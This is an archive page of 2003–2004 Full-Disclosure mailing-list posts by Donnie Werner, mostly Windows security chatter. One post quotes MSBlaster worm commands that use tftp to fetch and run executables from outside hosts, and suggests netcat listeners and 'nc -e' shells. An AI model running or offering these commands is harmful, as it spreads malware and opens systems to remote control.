by seeing this error, one might think phew, i just saved myself from
overwriting that file
but

2.) try running original program
C:\testprogram.exe
[popup]
C:\test\program is not a valid Win32 application.
[/popup]
Access is denied.

uh-o

3.) directory listing
C:\testdir
 Volume in drive C has no label.
 Volume Serial Number is 1F2E-1405

 Directory of C:\test

02/16/2003  03:00 AMDIR  .
02/16/2003  03:00 AMDIR  ..
02/16/2003  03:31 AM 0 program.exe
   9 File(s) 0 bytes
   2 Dir(s) 435,847,168 bytes free


i do not know if this is proper behavior.
but it would appear that you SHOULD be safe due to windows
file locking, and the saftey is further bolstered by nice warning.
but alas... Access Denied! 

so by observance we can deduce the following:
a. windows reads the originating program into memory ( fully(?)
b. the file output redirection (  ) causes a write to file to the redirection
call back upon itself, and thus begins overwriting the original file.
c. windows detects the file access and determines that this action is illegal
and halts the operation and warns the user.


note: not tested under other disc formats.

Donnie Werner
http://exploitlabs.com 








___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MCSE training question

2004-04-05 Thread morning_wood
Oh contraire, the first thing we do when we go onsite to work on windows box
is ask my client to reboot it first, particularly if it is a server, as
occassionally they they do not come back up, and we do not want to be blamed
just because the OS is unstable

and you claim to be a security professional?
( Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA )

the first thing would be to sit down at the suspect console and observe.
the second thing would be to... observe.
then i might consider a course of action...
possibly the box in question is instable because of a compromise,
or a worm or a 0day... what about that Curt?
never would i ( or tell anyone ) to just reboot that box before i touch it
now i know why fortune 500 companies get horrendous infections.

shocked and awed

Donnie Werner
http://exploitlabs.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ron1n phone home, episode 2

2004-04-04 Thread morning_wood
k-rad this is old... mmmk
possibly someone not from bbs days may not remember..
i got offline between 93-95

 We present to you the second installment of our introductionary series
 into the exciting world of Mostly Harmless Hacking. Hacking from Windows 95.
Copyright 1997

( recycling old zine's huh? )

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Microsoft Security CD

2004-04-03 Thread morning_wood
well... i got mine, but funny thing..

pstrongThis CD requires that JavaScript be enabled for your Web
browser./strong /p
pIf you need help re-enabling JavaScript for your browser, a
href=http://go.microsoft.com/fwlink/?linkid=9580; target=_blankclick
  here/a./p

then offers this screen...
You are downloading the file:
 WXPstart.hta from d:\Content
open save cancel moreinfo

being inquisitive and security minded i chose save
then i was left with a blank browser.
and a hta file on my desktop..
DOH!

anyway, the major XP/2Kx updates are as listed...
 Directory of D:\Content\fullfixes

02/05/2004  04:00 AMDIR  .
02/05/2004  04:00 AMDIR  ..
02/05/2004  04:00 AM   970,312 DirectX9-KB819696-x86-ENU.exe
02/05/2004  04:00 AM10,135,688 MPSetupXP.exe
02/05/2004  04:00 AM   818,464 Q819696_WXP_SP2_x86_ENU(DX8).exe
02/05/2004  04:00 AM   135,477,136 W2KSP4_EN.EXE
02/05/2004  04:00 AM   938,856 Windows2000-KB824146-x86-ENU.exe
02/05/2004  04:00 AM   367,752 WindowsMedia8-KB817787-x86-ENU.exe
02/05/2004  04:00 AM   433,952 WindowsXP-KB823182-x86-ENU.exe
02/05/2004  04:00 AM   346,400 WindowsXP-KB824105-x86-ENU.exe
02/05/2004  04:00 AM   305,248 WindowsXP-KB825119-x86-ENU.exe
02/05/2004  04:00 AM 9,442,912 WindowsXP-KB826939-x86-ENU.exe
02/05/2004  04:00 AM   365,664 WindowsXP-KB828035-x86-ENU.exe
02/05/2004  04:00 AM   369,504 js56nen.exe
02/05/2004  04:00 AM 1,992,832 q330994.exe
02/05/2004  04:00 AM 2,203,776 q828750.exe
02/05/2004  04:00 AM   131,170,400 xpsp1a_en_x86.exe
  15 File(s)295,338,896 bytes
   2 Dir(s)   0 bytes free




Donnie Werner
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] erase with magnet

2004-04-03 Thread morning_wood
 Is it possible to erase data on a hard disk drive 
with a powerful magnet, but then be able to use the drive and the PC again? 

yes

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: [FD] FD should block attachments

2004-04-02 Thread morning_wood
 Since some folks presumably want to be able to send and receive the latest
 MS innovations and other attachments, why don't you just block whatever
 you don't want to receive? I certainly do.
 

yes, exactly why is this concept so hard to get?
im presuming that the majority of complaintants
are either not very security minded to begin with,
or are complete n00bs ( joned the list cuz they
saw it was on CNN ). i like attatchments, whether
they are PoC, viri, worm, pdf, etc etc. i like the choice
to choose.
btw: i use Microsoft products [OE] to post to this list,
and have never got any virus or worm or anything
else i didnt want. and i do not run any AV nor filtering
nor firwall to this box. 
am i missing something here?
 because i realy do not see the issue.

morning_wood
http://exploitlabs.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] mirc 6.14

2004-03-28 Thread morning_wood
 every one is blabbling about some new mirc 6.14 dcc exploit. Is this true?
 has any body confirmed this?

http://searchirc.com/boards/viewtopic.php?t=1115
http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=mirc+6.14+exploitbtnG=Go
ogle+Search

i like Google©


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] SHUT THE FUCK UP

2004-03-24 Thread morning_wood
 I'd like to suggest everybody starts sending an annoying mail back to the
 poster of useless crap like this AND NOT TO THE LIST.

 I try to make a habit of sending n00b mail to the AV notices i recieve
as someone on this list has / does get infected, my address gets spoofed,
and mr.N00bular with GheeWhizzSpamAntiVirusPopupblocker© e-mail
gateway/firewall/av utility spits out assinine mail to me that contributes
to a total waste of bandwith, and a loss of time® for all partis concerned.

my two bits
Donnie Werner
http://exploitlabs.com

time® is a trademark of Universe©
Public use permited by fair use agreement ( copyright [NULL] )

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: text

2004-03-24 Thread morning_wood
 However, in this case, *I* sent the virus.  I had the word t e x t . p i 
 f in the body of my message (without the spaces, of course), and the 
 poorly configured AV scanners detected a virus.
 

about as funny as this
( http://lists.netsys.com/pipermail/full-disclosure/2003-May/005244.html )
when I sent a text message with only viri / worm names in it.
I should generate a new one to see what comes out the other end


D.Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] winxp home expusure

2004-03-22 Thread morning_wood
 Hi,
 
 How bad is it to have Win XP HOME at work - in LAN ?
 I ask for security reasons - I just logged off in winxp home from 
 vncviewer and it said -closing all network connections ...- and my vnc 
 connection still remained active :)?
 

sometimes winXP's tcp parameters keep a connection open for 4 minutes or more.
try using tcpview.exe ( www.sysinternals.com/ntw2k/source/tcpview.shtml )
also, some programs dont exit clean, etc etc...

Donnie Werner
http://exploitlabs.com 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] HOTMAIL / PASSPORT: phishing expedition

2004-03-18 Thread morning_wood
 buddyiframe src=http://www.malware.com/pithy.html;
so could this url be considered a phishing scam ?
 regardless of your implied intent? It does pretend
to be a genuine login, and i am sure you are collecting successfull
attempts to a log ( right? ). Has your demo oversteped the bounds
of  security research into the realm of collecting confidental 
( login / password ) information for purposes of access circumvention ?

currious,

Donnie Werner
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Microsoft Security, baby steps ?

2004-03-13 Thread morning_wood
Gimme a break..
http://go.microsoft.com/?LinkID=422101

although this could be amusing...
http://www.microsoft.com/security/protect/cd/order.asp


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Caching a sniffer

2004-03-11 Thread morning_wood
  How can i know if there a sniffer running in my network?
 
 When you wake up one day to find that you're 0wn3d :-)
 
 Seriously, about the only way I can think of to detect a sniffer with
 its transmit leads cut is with a Time Domain Reflectometer (TDR) and
 look for an unexplained impedance bump.
 

try your detection tools on a simple sniffer at
http://exploitlabs.com/files/misc/xsniff.zip

does not use pcap or any other cap libs that I am aware of.

m.wood


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] mydoom.c information

2004-03-07 Thread morning_wood
  bascially looking for sync-src-1.00.tbz.  That message was posted to this
 
 avail on infected hosts
 
  This is how I came to be in possession of it:
  
  nc -l -p 3127  doomjuice.dump
  
   You will probably want to write a
  loop to restart netcat because it exits after a successful transfer.
  
 
 nc -L -p 3127  out.txt   
 note:  -L   will not exit your netcat,  as it is for a persistant listener.
 
 please see 
 http://lists.netsys.com/pipermail/full-disclosure/2004-February/017126.html
 
 as i do not wish to type-iterate.
 
 Donnie Werner
 http://exploitlabs.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] mydoom.c information

2004-03-07 Thread morning_wood
 Now I'm confused...
 
 [EMAIL PROTECTED] /storage/virii] $ nc -h
 GNU netcat 0.7.1, a rewrite of the famous networking tool.
 Basic usages:
 connect to somewhere:  nc [options] hostname port [port] ...
 listen for inbound:nc -l -p port [options] [hostname] [port] ...
 tunnel to somewhere:   nc -L hostname:port -p port [options]
  
 Mandatory arguments to long options are mandatory for short options too.
 Options:
   -c, --closeclose connection on EOF from stdin
   -e, --exec=PROGRAM program to exec after connect
   -g, --gateway=LIST source-routing hop point[s], up to 8
   -G, --pointer=NUM  source-routing pointer: 4, 8, 12, ...
   -h, --help display this help and exit
   -i, --interval=SECSdelay interval for lines sent, ports scanned
   -l, --listen   listen mode, for inbound connects
   -L, --tunnel=ADDRESS:PORT  forward local port to remote address
 
 /* snip */
 
 
 Does persistent listener == tunnel?


hmm.. my netcat is different and i compiled from Hobbit's sources..

 snip ---

C:\Documents and Settings\Administratornc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d  detach from console, background mode

-e prog inbound program to exec [dangerous!!]
-g gateway  source-routing hop point[s], up to 8
-G num  source-routing pointer: 4, 8, 12, ...
-h  this cruft
-i secs delay interval for lines sent, ports scanned
-l  listen mode, for inbound connects
-L  listen harder, re-listen on socket close
-n  numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r  randomize local and remote ports
-s addr local source address
-t  answer TELNET negotiation
-u  UDP mode
-v  verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z  zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
--- snip 

note:  -L  listen harder, re-listen on socket close

mabey confusion rules the day?
or your GNU netcat 0.7.1,  a rewrite of the famous networking tool.
 netcat really sucks


Donnie Werner
http://exploitlabs.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Scary Question

2004-03-01 Thread morning_wood
 I heard that it was possible to cause irrepareable
 damage to any electronic circuit through
 certain waves or radio emissions ( I'm not qualified
 in this subject ).

ESD
Google is my friend..
http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=esd
make him yours.

D.Werner
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Re: GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-18 Thread morning_wood
 Many of these systems come from the vendor with default shares enabled 
 allowing anonymous access, no patches, default passwords, no anti-virus, 
 etc. Many health-care organizations then proceed to plug them into the 
 general network and pretend that nothing's wrong.

ahem... this is not a windows issue.

Sounds like you need a vendor that does its job,
not just VAR you to death and leave you to
your own destruction.. 

Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com
360-312-8011 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] trust? - win2k source code tools

2004-02-16 Thread morning_wood
NOW EVERY EXECUTABLE IS TRUSTED AND DIGITALY SIGNED

found this interesting...
\win2k\private\inet\mshtml\build\scripts\tools\x86

iexpress.exe 
signcode.exe
makecert.exe ( DigSig.dll )

( in fast food voice ) and who would you like your package to be certified
from today sir?
\win2k\private\ispu\pkitrust\initpki\certs\



looks like the viri / trojan kiddies will have some fun with this.
yikes to PE format executables.

alas... i could be wrong,

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread morning_wood
  IE6 is not vulnerable, so I guess I'll get back to work.  My Warhol
  worm will have to wait a bit...

Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB [EMAIL PROTECTED] 

guess those sources are good for something huh 
( , ubber biscuit? )


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread morning_wood
 please enlighten us on your versions numbers / patch levels wood.
 -KF
 
 
 morning_wood wrote:
  Dunno but your message crashes OE on (pre)view.
  no warning, no nothin... OE just *bink* closes
  NICE JOB [EMAIL PROTECTED] 
  

Symtoms were reported using the following:

Windows XP Pro ( Gold SP0 )
OE Version = 6.00.2600.(xpclient 010817-1148)

dll's not matching version sig:

csapi3t1.dll unknown
mshtml.dll6.00.2734.1600
msoe.dll  6.00.2720.3000
msoeacct.dll6.00.2800.1123
msoert2.dll  6.00.2800.1123
ole32.dll  5.1.2600.115(xpclient_qfe.021108-2107
riched20.dll  5.30.23.1210
riched32.dll  5.1.2600.0(xpclient 010817-1148)
wab32.dll unknown
wab32res.dll unknown


note: I was forced to go to hotmail via the web interface,
 and manualy delete the message to restore function. 

further, my Security tab in options is set to Internet Zone
( less secure ) on the account in question.

 One more note of observance in OE6, each account can be independantly
set for security zones even in a single user machine. I now check
security settings on every account per machine ( not user login ) , 
however I have not noted if the settings are inherited from the current
IE security settings at the time of account creation ( but would explain
my different settings accross 6 accounts on a single usder box ).


Donnie Werner
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: HelpCtr - allow open any page or run

2004-02-13 Thread morning_wood

 win2k sp4
 
 does not work 
 
Help Center only ships with Me, XP and Win2k3

btw..  UNCONFIRMED in Xp Pro Sp0




m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] RE: W2K source leaked?

2004-02-13 Thread morning_wood
it has been leaked , also for the winnt 4 and the windows XP sourcecode

files like : windows.2000.source.code-IND are now roaming irc channels and
webpages ... it is an hard day for microsoft i guess 
 
 I have seen these files... personaly I find it hard to belive the NT / 2k base
is bigger that a 200mb zip. What it does look like is a core subset of some
parts of windows with sources. I can bet that what is in the release was
heavily audited and not realy a loss in anyones book.

my2bits

Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Funny, I thought I mailed FULL DISCLOSURE

2004-02-12 Thread morning_wood

- Original Message -
From: Lyris ListManager [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, February 11, 2004 5:49 PM
Subject: Message rejected
 Return-Path: [EMAIL PROTECTED]
 Received: from smarthost3.mail.uk.easynet.net ([212.135.6.13]) by
listserv.patchmanagement.org with SMTP (Lyris ListManager WIN32 version 7.8b);
Wed, 11 Feb 2004 20:49:06 -0500
 Received: from spirahellicmultimedia-11.dsl.easynet.co.uk ([212.135.176.251]
helo=spirasecondary.spirainternal.co.uk)
 by smarthost3.mail.uk.easynet.net with esmtp (Exim 4.10)
 id 1Ar5uh-0005g3-00
 for [EMAIL PROTECTED]; Thu, 12 Feb 2004 01:45:11
+
 Received: from spiramain.spirainternal.co.uk ([10.0.0.150])
   by spirasecondary.spirainternal.co.uk (Lotus Domino Release 5.0.8)
   with ESMTP id 2004021201445193:5736 ;
   Thu, 12 Feb 2004 01:44:51 +
 Received: from mail pickup service by spiramain.spirainternal.co.uk with
Microsoft SMTPSVC;
 Thu, 12 Feb 2004 01:45:09 +
 Delivered-To: spirah-spira:co:[EMAIL PROTECTED]
 X-Envelope-To: [EMAIL PROTECTED]
 Received: (qmail 75370 invoked from network); 12 Feb 2004 01:40:24 -
 Received: from outgoing2.securityfocus.com (205.206.231.26)
   by raitax.pair.com with SMTP; 12 Feb 2004 01:40:24 -
 Received: from lists2.securityfocus.com (lists2.securityfocus.com
[205.206.231.20])
 by outgoing2.securityfocus.com (Postfix) with QMQP
 id 51E2B9113D; Wed, 11 Feb 2004 07:54:59 -0700 (MST)
 Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
 Precedence: bulk
 List-Id: bugtraq.list-id.securityfocus.com
 List-Post: mailto:[EMAIL PROTECTED]
 List-Help: mailto:[EMAIL PROTECTED]
 List-Unsubscribe: mailto:[EMAIL PROTECTED]
 List-Subscribe: mailto:[EMAIL PROTECTED]
 Delivered-To: mailing list [EMAIL PROTECTED]
 Delivered-To: moderator for [EMAIL PROTECTED]
 Received: (qmail 14774 invoked from network); 10 Feb 2004 22:07:52 -
 X-Originating-IP: [4.65.224.219]
 X-Originating-Email: [EMAIL PROTECTED]
 X-Sender: [EMAIL PROTECTED]
 From: morning_wood [EMAIL PROTECTED]
 To: [EMAIL PROTECTED], [EMAIL PROTECTED],
 [EMAIL PROTECTED],
 [EMAIL PROTECTED]
 References: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Another Low Blow From Microsoft: MBSA Failure!
 Date: Tue, 10 Feb 2004 20:14:08 -0800
 MIME-Version: 1.0
 X-Priority: 3 (Normal)
 X-MSMail-Priority: Normal
 X-Mailer: Microsoft Outlook Express 6.00.2720.3000
 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300
 Message-ID: [EMAIL PROTECTED]
 X-OriginalArrivalTime: 11 Feb 2004 04:14:53.0320 (UTC)
FILETIME=[99693080:01C3F055]
 X-MIMETrack: Itemize by SMTP Server on spirasecondary/SpiraHellic(Release
5.0.8 |June 18, 2001) at
  02/12/2004 01:44:51 AM,
 Serialize by Router on spirasecondary/SpiraHellic(Release 5.0.8 |June 18,
2001) at
  02/12/2004 01:44:52 AM,
 Serialize complete at 02/12/2004 01:44:52 AM
 Content-Transfer-Encoding: 7bit
 Content-Type: text/plain;
 charset=iso-8859-1

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ms04-007 Scan tool?

2004-02-11 Thread morning_wood

 Does anyone know of a vulnerability scanner yet? I found a nessus plugin
 but all it does is check the registry for the existence of the patch.
 
 Thanks,
 
 Jeff
 


try looking for open port 3127

or even open up a netcat ( thanks Hobbit ) listener
nc -L -n -v -p 3127

also do the same for RPC-DCOM aka msblaster

heres a sample...

tftp -i 4.65.168.122 GET msblast.exe
start msblast.exe
msblast.exe

tftp -i 4.65.174.100 GET mslaugh.exe
start mslaugh.exe
mslaugh.exe

tftp -i 192.168.1.12 GET teekids.exe
start teekids.exe
teekids.exe

tftp -i 4.65.194.212 GET enbiei.exe 
start enbiei.exe 
enbiei.exe 

.. yes there are 4 variants.

to get infected ( capture one ) try netcat with the -e

to call cmd.com listening on port  as well... fun trick.

morning_wood
http://exploitlabs.com 





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] FD foobar?

2004-02-10 Thread morning_wood
feb - 2006 ???
feb - 2005 ???

http://lists.netsys.com/pipermail/full-disclosure/
sorted by date.


The Full-Disclosure Archives
You can get more information about this list or you can download the full raw
archive ( 92 MB ).
ArchiveView by:Downloadable version
2006-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Text 1 KB ]
2005-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 500
bytes ]
2004-October:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 677
bytes ]
2004-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 507 KB ]
2004-January:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ]
2003-December:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ]
2003-November:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ]

there is atleast one post in the bad yeasrs that I did not recieve via normal
list email,
and i thought this might have something to do with it.
any others experience this?

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Another Low Blow From Microsoft: MBSA Failure!

2004-02-10 Thread morning_wood
 been applied. We have scanned with Retina, Foundstone and Qualys tools
 which they all showed as VULNERABLE, however when we scanned with Microsoft
 Base Security Analyzer it showed as NOT VULNERABLE. This was at first
 confusing; one would think an assessment tool released by the original

did you try exploit code to verify? that should dispel any ambiguity
across scanner reports, it would be real easy to load your network
hosts into a batch file or shell script and see how many roots you get.

just a thought... eliminates alot of guesswork.. ( imo )

m.wood
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Virus infect on single user

2004-02-09 Thread morning_wood
 I noticed that the file was last modified a day that i ddin't open my pc. Is
there any change for that file to have attributes than the real one?

not uncommon for date manipulation with trojans. Beast 2.05 uses activeX
startup routines and file date manipulation of the files ( files are dated
8/23/2001 ).


Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] * in url

2004-01-13 Thread morning_wood
dunno if this is new but..

http://pa.yahoo.com/*http://rd.yahoo.com/hotjbs/*http://example.com


m.wood 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Alleged IT security extortion plot against BestBuy.com

2004-01-07 Thread morning_wood
  http://www.startribune.com/stories/535/4304797.html
 

in re-reading this article i was presented with
 an offer to subscribe/signup/register to the StarTribune
 when re-clicking on the above link. The redirected url is
http://24hour.startribune.com/login/?goto=http://www.startribune.com/stories/535
/4304797.html

To access startribune.com content and features, you must be a registered
member.
Becoming a registered member is fast and FREE. Just fill out the following
information and you'll have access to all startribune.com offers, including
content, features, newsletters, contests, special offers and Talk. Let's get
started.


Deleting the cookie restores the link to the article without the signup.
cookie: [EMAIL PROTECTED]


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] OnStar backdoor in your car...

2004-01-06 Thread morning_wood
The FBI and other police agencies may not eavesdrop on conversations inside
automobiles equipped with OnStar or similar dashboard computing systems...
 http://news.com.com/2100-1029_3-5109435.html


uhhh...
Big brother is now

m. wood
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV

2004-01-02 Thread morning_wood
 On Thu, 1 Jan 2004 22:41:35 - [EMAIL PROTECTED] wrote:
 [snip]
  Fully self-contained harmless *.exe:
 
  http://www.malware.com/exe-cute-html.zip
 [snip]

 This doesn't look like self-executing HTML - anyway.


Gives dialog box to open or save a blabla.hta and no, it does not self-execute
even under
low security settings.  try again Jelmer?


morning_wood
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV

2004-01-02 Thread morning_wood
 Your post isn't verry informative
 what kind of system did you test it on? It worked on my fully patched
 windows XP


WinXp Sp0  IE6 010817-1148

running http://microsoft.bbs.us/malware.html;  i get only a webpage with
junkware
and no file(s) on my hd.

running malware.html locally does produce the desired results, but then
again...
i can get any html to execute locally calling a remote location for the code, as
long as its run
from the local machine.

m.w00d





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] WinME firewalling

2003-11-09 Thread morning_wood
Actualy winMe is quite safe out of the box ( its win9x ) and
does not have the remote compromises that affect winXP / win2k

Donnie Werner
E2 Labs
 
- Original Message - 
From: j [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 6:33 AM
Subject: [Full-Disclosure] WinME firewalling


 I'm interested in opinions from list participants - all my work is with
 linux, like a firewalling linux bridge on a win/lin mixed network.
 
 Given:  A technologically-impaired grandmother with winME.  Any change
 of OS would be psychologically damaging... (WinXP 'kindergarten crayon'
 default theme would probably induce seizures... ;^)  Grandma now gets a
 DSL connection, and as per the ISP has this shiny new DSL modem plugged
 into said WinME machine, both now powered up ~24 hours per day, an open
 orifice with a target painted on it.
 
 What software firewall solution is truly suitable for Grandma?  As
 invisible to the user as possible, of course, since this Grandma doesn't
 understand most of the 'little window thingies' that spontaneously
 appear already.  (you know at least one - the manic 'ok' clicker...) 
 Additional hardware of any kind is not permitted, this has to be a
 software solution under WinME.
 
 Clearly there are 'social' factors in training such a user - I'm looking
 for opinions regarding the software end of things, not 'whack her in the
 head every time she clicks OK without reading' suggestions.  :^)
 
 Thanks.
 
 j
 
 ---
 
 MCP  -  Defenestrator  -  Cynic
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] WinME firewalling

2003-11-09 Thread morning_wood
yes, excuse *cough* my not mentioning the IE vunerabilities,
... details... details.
Comparativly, putting a win9x based box on a open
internet connection, without browsing in Internet Explorer,
is safer than a win XP / 2K box ( as we saw without even 
logging in as i had pointed out, just before LSD release of RPC
exploit code ) on the same connection.

So go buy grandma winME, and update to the latest non IE or
patched IE 6, no fancy-smanshy firewall or setup pains needed
oh and set her Outlook Express to disable HTML to view mail.
and no kazza ( p2p ) or the elderlys favorite, Bonzi Buddy (but mr
technician... he talks to me)   for crying out loud


Donnie Werner
[EMAIL PROTECTED]



- Original Message - 
From: [EMAIL PROTECTED]
To: morning_wood [EMAIL PROTECTED]
Cc: j [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 8:44 AM
Subject: Re: [Full-Disclosure] WinME firewalling 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IE object vulnerability

2003-11-05 Thread morning_wood
ever try google?
http://www.google.com/search?hl=enie=UTF-8oe=UTF-8q=eeye+objectbtnG=Google+Search

morning_wood


- Original Message - 
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, November 05, 2003 2:06 PM
Subject: [Full-Disclosure] IE object vulnerability


 hey actually I want the code of the file
 http://morningwood.ethicsdesign.com/fucked4test.asp
 can anyone give it to me

 _
 The new MSN 8: smart spam protection and 2 months FREE*
 http://join.msn.com/?page=features/junkmail

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] IE obvject vuln

2003-11-04 Thread morning_wood
 it is a demo of the object tag exploit code, asp is server side script that
does not render in the browser, that is why you cant see it.

morning_wood


- Original Message - 
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, November 04, 2003 3:09 PM
Subject: [Full-Disclosure] IE obvject vuln


 Can anyone tell me about IE object vuln
 wat kind of asp file is used
 morningwood.ethicsdesign.com/cmd.asp
 
 _
 Add photos to your e-mail with MSN 8. Get 2 months FREE*. 
 http://join.msn.com/?page=features/featuredemail
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  1   2   3   4   >